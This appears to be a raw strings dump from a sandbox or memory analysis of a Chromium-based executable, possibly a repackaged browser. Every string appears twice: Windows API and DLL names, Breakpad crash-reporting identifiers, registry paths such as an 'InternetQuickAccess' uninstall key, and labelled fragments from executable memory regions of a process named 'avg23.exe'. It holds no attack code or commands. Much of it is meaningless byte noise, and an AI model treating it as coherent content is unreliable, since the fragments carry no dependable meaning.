c:\projects\chromium_clean\src\sandbox\win\src\interception.cc
CreateNamedPipeW
CreateNamedPipeW
NtCreateKey
NtCreateKey
NtOpenKey
NtOpenKey
NtOpenKeyEx
NtOpenKeyEx
MetricsReportingEnabled
MetricsReportingEnabled
full-memory-crash-report
full-memory-crash-report
CHROME_VERSION
CHROME_VERSION
CHROME_HEADLESS
CHROME_HEADLESS
CHROME_METRO_CONNECTED
CHROME_METRO_CONNECTED
CHROME_CRASHED
CHROME_CRASHED
CHROME_RESTART
CHROME_RESTART
chrome.googleechotest.com
chrome.googleechotest.com
CHROME_BREAKPAD_PIPE_NAME
CHROME_BREAKPAD_PIPE_NAME
c:\projects\chromium_clean\src\components\crash\app\breakpad_win.cc
c:\projects\chromium_clean\src\components\crash\app\breakpad_win.cc
NTDLL.DLL
NTDLL.DLL
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
function not supported
function not supported
operation canceled
operation canceled
address_family_not_supported
address_family_not_supported
operation_in_progress
operation_in_progress
operation_not_supported
operation_not_supported
protocol_not_supported
protocol_not_supported
operation_would_block
operation_would_block
address family not supported
address family not supported
broken pipe
broken pipe
inappropriate io control operation
inappropriate io control operation
not supported
not supported
operation in progress
operation in progress
operation not permitted
operation not permitted
operation not supported
operation not supported
operation would block
operation would block
protocol not supported
protocol not supported
GetProcessWindowStation
GetProcessWindowStation
operator
operator
c:\projects\chromium_clean\src\out\Release\initialexe\chrome.exe.pdb
c:\projects\chromium_clean\src\out\Release\initialexe\chrome.exe.pdb
chrome.exe
chrome.exe
ClearBreakpadPipeEnvironmentVariable
ClearBreakpadPipeEnvironmentVariable
ClearCrashKeyValueImpl
ClearCrashKeyValueImpl
SetCrashKeyValueImpl
SetCrashKeyValueImpl
SignalChromeElf
SignalChromeElf
chrome_elf.dll
chrome_elf.dll
VERSION.dll
VERSION.dll
WINMM.dll
WINMM.dll
RegCloseKey
RegCloseKey
RegCreateKeyExW
RegCreateKeyExW
RegEnumKeyExW
RegEnumKeyExW
RegOpenKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegQueryInfoKeyW
ADVAPI32.dll
ADVAPI32.dll
CloseWindowStation
CloseWindowStation
CreateWindowStationW
CreateWindowStationW
SetProcessWindowStation
SetProcessWindowStation
USER32.dll
USER32.dll
GetProcessHeap
GetProcessHeap
GetWindowsDirectoryW
GetWindowsDirectoryW
CreateIoCompletionPort
CreateIoCompletionPort
GetProcessHandleCount
GetProcessHandleCount
KERNEL32.dll
KERNEL32.dll
USERENV.dll
USERENV.dll
WTSAPI32.dll
WTSAPI32.dll
GetCPInfo
GetCPInfo
SetNamedPipeHandleState
SetNamedPipeHandleState
TransactNamedPipe
TransactNamedPipe
WaitNamedPipeW
WaitNamedPipeW
zcÃ
zcÃ
4P5F5^576W6m6[7u7
4P5F5^576W6m6[7u7
5.64686
5.64686
4,50585
4,50585
chrome_watcher.dll
chrome_watcher.dll
ntdll.dll
ntdll.dll
chrome.dll
chrome.dll
chrome_child.dll
chrome_child.dll
metro_driver.dll
metro_driver.dll
{7D2B3E1D-D096-4594-9D8F-A6667F12E0AC}
{7D2B3E1D-D096-4594-9D8F-A6667F12E0AC}
{A2DF06F9-A21A-44A8-8A99-8B9C84F29160}
{A2DF06F9-A21A-44A8-8A99-8B9C84F29160}
Browse the web fast
Browse the web fast
Software\Microsoft\Windows\CurrentVersion\Uninstall\InternetQuickAccess
Software\Microsoft\Windows\CurrentVersion\Uninstall\InternetQuickAccess
-chrome
-chrome
-chromeframe
-chromeframe
WebAccessible
WebAccessible
{8BA986DA-5100-405E-AA35-86F34A02ACBF}
{8BA986DA-5100-405E-AA35-86F34A02ACBF}
DGoogle Chrome Frame
DGoogle Chrome Frame
Google\Chrome Frame
Google\Chrome Frame
Chrome in a Frame.
Chrome in a Frame.
Uninstall Chrome Frame
Uninstall Chrome Frame
Software\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome Frame
Software\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome Frame
Ndebug.log
Ndebug.log
.\debug.log
.\debug.log
\StringFileInfo\xx\%ls
\StringFileInfo\xx\%ls
Chrome_MessageWindow
Chrome_MessageWindow
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_TEXT
HKEY_PERFORMANCE_TEXT
HKEY_PERFORMANCE_NLSTEXT
HKEY_PERFORMANCE_NLSTEXT
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_DYN_DATA
pipe\
pipe\
Bkernel32.dll
Bkernel32.dll
kernelbase.dll
kernelbase.dll
\Sessions\%d\AppContainerNamedObjects\%ls
\Sessions\%d\AppContainerNamedObjects\%ls
eKey
eKey
Ckernel32.dll
Ckernel32.dll
gdi32.dll
gdi32.dll
xntdll.dll
xntdll.dll
wow_helper.exe"
wow_helper.exe"
shell32.dll
shell32.dll
gcswf32.dll
gcswf32.dll
Crash Reports
Crash Reports
script.log
script.log
resources.pak
resources.pak
chrome
chrome
pepflashplayer.dll
pepflashplayer.dll
${windows}
${windows}
\\.\pipe\GoogleCrashServices\
\\.\pipe\GoogleCrashServices\
\\.\pipe\ChromeCrashServices
\\.\pipe\ChromeCrashServices
error %u
error %u
hunspecified-crash-key
hunspecified-crash-key
Dmscoree.dll
Dmscoree.dll
ADVAPI32.DLL
ADVAPI32.DLL
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
USER32.DLL
USER32.DLL
portuguese-brazilian
portuguese-brazilian
dbghelp.dll
dbghelp.dll
rpcrt4.dll
rpcrt4.dll
%s\%s.dmp
%s\%s.dmp
x-x-x-xx-xxxxxx
x-x-x-xx-xxxxxx
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe
45.0.2433.0
45.0.2433.0
chrome_exe
chrome_exe
avg23.exe_1836_rwx_03EF0000_00005000:
{"%u^
{"%u^
k"%u^
k"%u^
["%u^
["%u^
;"%u^
;"%u^
s %u^
s %u^
c %u^
c %u^
S %u^
S %u^
3 %u^
3 %u^
avg23.exe_1836_rwx_03F10000_00010000:
%u;F u
%u;F u
rO%u;
rO%u;
oH%uP
oH%uP
q%u;F u
q%u;F u
o%u;F u
o%u;F u
M*%uP
M*%uP
7*%uP
7*%uP
^%u;F u
^%u;F u
K%u;F u
K%u;F u
"?%u;F4u
"?%u;F4u